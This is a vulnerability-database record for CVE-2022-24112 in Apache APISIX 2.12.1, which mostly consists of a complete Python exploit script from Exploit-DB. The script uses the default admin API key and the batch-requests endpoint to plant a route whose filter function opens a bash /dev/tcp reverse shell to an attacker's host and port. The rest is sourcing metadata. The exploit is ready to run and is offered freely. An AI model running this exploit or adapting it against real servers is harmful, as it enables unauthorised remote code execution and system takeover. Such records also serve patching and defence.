Details of VAR-E-202203-0014

ID

VAR-E-202203-0014

CVE

cve_id:	CVE-2022-24112	Trust: 2.0
cve_id:	CVE-2020-13945	Trust: 0.5

sources: PACKETSTORM: 166228 // PACKETSTORM: 166328 // EXPLOIT-DB: 50829

EDB ID

50829

TITLE

Apache APISIX 2.12.1 - Remote Code Execution (RCE) - Multiple remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 50829

DESCRIPTION

Apache APISIX 2.12.1 - Remote Code Execution (RCE). CVE-2022-24112 . remote exploit for Multiple platform

Trust: 0.6

sources: EXPLOIT-DB: 50829

AFFECTED PRODUCTS

vendor:	apache	model:	apisix	scope:	eq	version:	2.12.1	Trust: 2.1
vendor:	apache	model:	apisix	scope:	-	version:	-	Trust: 0.5

sources: PACKETSTORM: 166228 // PACKETSTORM: 166328 // EXPLOIT-DB: 50829 // EDBNET: 105259

EXPLOIT

# Exploit Title: Apache APISIX 2.12.1 - Remote Code Execution (RCE)
# Date: 2022-03-16
# Exploit Author: Ven3xy
# Vendor Homepage: https://apisix.apache.org/
# Version: Apache APISIX 1.3 – 2.12.1
# Tested on: CentOS 7
# CVE : CVE-2022-24112

import requests
import sys

class color:
HEADER = '\033[95m'
IMPORTANT = '\33[35m'
NOTICE = '\033[33m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
RED = '\033[91m'
END = '\033[0m'
UNDERLINE = '\033[4m'
LOGGING = '\33[34m'
color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]

def banner():
run = color_random[6]+'''\n . ,
_.._ * __*\./ ___ _ \./._ | _ *-+-
(_][_)|_) |/'\ (/,/'\[_)|(_)| |
| |
\n'''
run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n'''
run3 = color_random[4]+'''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n'''
print(run+run2+run3)

if (len(sys.argv) != 4):
banner()
print("[!] Usage : ./apisix-exploit.py <target_url> <lhost> <lport>")
exit()

else:
banner()
target_url = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]

headers1 = {
'Host': '127.0.0.1:8080',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/json',
'Content-Length': '540',
'Connection': 'close',
}

headers2 = {
'Host': '127.0.0.1:8080',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/json',
'Connection': 'close',
}

json_data = {
'headers': {
'X-Real-IP': '127.0.0.1',
'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
'Content-Type': 'application/json',
},
'timeout': 1500,
'pipeline': [
{
'path': '/apisix/admin/routes/index',
'method': 'PUT',
'body': '{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}',
},
],
}

response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False)

response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False)

Trust: 1.0

sources: EXPLOIT-DB: 50829

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 50829

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 50829

TYPE

Remote Code Execution (RCE)

Trust: 1.6

sources: EXPLOIT-DB: 50829 // EDBNET: 105259

CREDITS

Ven3xy

Trust: 0.6

sources: EXPLOIT-DB: 50829

EXTERNAL IDS

db:	NVD	id:	CVE-2022-24112	Trust: 2.0
db:	EXPLOIT-DB	id:	50829	Trust: 1.6
db:	EDBNET	id:	105259	Trust: 0.6
db:	NVD	id:	CVE-2020-13945	Trust: 0.5
db:	OPENWALL	id:	OSS-SECURITY/2022/02/11/3	Trust: 0.5
db:	PACKETSTORM	id:	166228	Trust: 0.5
db:	PACKETSTORM	id:	166328	Trust: 0.5

sources: PACKETSTORM: 166228 // PACKETSTORM: 166328 // EXPLOIT-DB: 50829 // EDBNET: 105259

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2022-24112	Trust: 2.0
url:	https://www.exploit-db.com/exploits/50829/	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2020-13945	Trust: 0.5

sources: PACKETSTORM: 166228 // PACKETSTORM: 166328 // EXPLOIT-DB: 50829 // EDBNET: 105259

SOURCES

db:	PACKETSTORM	id:	166228
db:	PACKETSTORM	id:	166328
db:	EXPLOIT-DB	id:	50829
db:	EDBNET	id:	105259

LAST UPDATE DATE

2022-07-27T09:34:42.728000+00:00

SOURCES RELEASE DATE

db:	PACKETSTORM	id:	166228	date:	2022-03-07T16:27:59
db:	PACKETSTORM	id:	166328	date:	2022-03-16T16:46:44
db:	EXPLOIT-DB	id:	50829	date:	2022-03-16T00:00:00
db:	EDBNET	id:	105259	date:	2022-03-16T00:00:00

tag:	exploit	Trust: 1.0
tag:	remote	Trust: 1.0
tag:	code execution	Trust: 1.0

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES RELEASE DATE